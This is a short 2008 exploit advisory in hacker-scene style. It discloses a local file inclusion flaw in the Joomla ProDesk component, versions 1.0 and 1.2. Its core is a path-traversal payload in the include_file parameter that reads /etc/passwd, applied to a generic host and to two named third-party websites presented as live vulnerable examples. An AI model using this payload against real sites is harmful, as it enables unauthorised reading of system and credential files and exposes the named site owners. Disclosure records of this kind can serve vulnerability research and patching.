[~]------------------------------------------------------------------------------------------------------- [~] Joomla Component ProDesk v 1.0 AND 1.2 (com_pro_desk&include_file) Local File Inclusion Vulnerability [~] [~] http://joomlashowroom.com/index.php/Pro-Desk-Support-Center/Pro-Desk-Support-Center.html [~] [~] [~] ---------------------------------------------------------------------------------------------------- [~] Bug founded by d3v1l [Avram Marius] [~] [~] Date: 4.11.2008 [~] [~] [~] d3v1l@spoofer.com http://security-sh3ll.com [~] [~] ----------------------------------------------------------------------------------------------------- [~] Greetz tO ALL:- [~] [~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) [~] [~] milw0rm staff [~]------------------------------------------------------------------------------------------------------ [~] Exploit :- [~] [~] http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd [~] [~] Ex :- v 1.2 [~] [~] http://www.reviewyou.com.au/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd [~]------------------------------------------------------------------------------------------------------- [~] [~] Ex :- v1.0 [~] [~] http://www.ppcmanagement.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd [~]---------------------------------------------------------------------------------------------------------